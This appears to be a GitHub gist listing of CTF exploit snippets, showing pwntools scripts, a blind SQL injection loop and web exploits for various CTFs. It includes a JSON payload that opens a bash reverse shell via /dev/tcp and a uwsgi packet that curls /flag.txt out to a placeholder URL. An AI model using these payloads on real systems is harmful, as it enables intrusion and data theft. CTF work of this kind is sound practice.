Skip to content

Instantly share code, notes, and snippets.

View shpik-kr's full-sized avatar
CAFE

shpik shpik-kr

CAFE
View GitHub Profile
@shpik-kr
shpik-kr / harekaze_note.py
Last active May 19, 2019 06:51
HarekazeCTF 2019 Harekaze_Note
from pwn import *
r = process('./note')
#r = remote('problem.harekaze.com',20003)
#context.log_level = 'debug'
e = ELF('./note')
l = e.libc
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))
@shpik-kr
shpik-kr / exp.py
Created September 15, 2019 01:27
babysql writeup
import requests
import urllib
import json
url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x)
cnt = 0
pw = ''
for i in range(1,33):
tmp = 0
@shpik-kr
shpik-kr / csp.py
Last active February 10, 2020 03:39
Codegate 2020 Quals Web Exploit code
'''
1. hash length extension: Make multi query.
2. header injection: Remove CSP header, and XSS occur
'''
import hashpumpy
import requests
b64e = lambda x:x.encode('base64').replace('\n','')
@shpik-kr
shpik-kr / plane_market.py
Created March 3, 2020 17:08
Aero CTF 2020 Pwn
from pwn import *
#r = process('./plane_market')
r = remote('tasks.aeroctf.com', 33087)
c0 = lambda:r.recvuntil(':')
c1 = lambda:r.recvuntil('>')
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))
@shpik-kr
shpik-kr / exp.py
Last active June 8, 2020 02:06
Defenit CTF 2020 - Tar Analyzer
#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess
'''
Vulnerabilities:
1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
@shpik-kr
shpik-kr / README.md
Created July 12, 2020 08:05
beginner_web

Chaining this, then you can get flag.

Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__

FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}

@shpik-kr
shpik-kr / beginners-capsule
Last active October 12, 2020 14:00
SECCON 2020 - Web
var __classPrivateFieldSet = function(receiver, privateMap, value) {
if (!privateMap.has(receiver)) {
throw new TypeError(
"attempted to set private field on non-instance"
);
}
privateMap.set(receiver, value);
console.log(privateMap.get(flag));
return value;
};
@shpik-kr
shpik-kr / harmony_chat.py
Created November 23, 2020 14:51
DragonCTF 2020 - Web
import websockets
import asyncio
import json
import socket
host = "ws://harmony-1.hackable.software:3380/chat"
payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'
def register(username):
@shpik-kr
shpik-kr / pbctf2020_simplenote.py
Created December 7, 2020 00:59
pbctf2020 simplenote
import requests
url = "http://simplenote.chal.perfect.blue/"
data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a'
r = requests.post(url, data = data)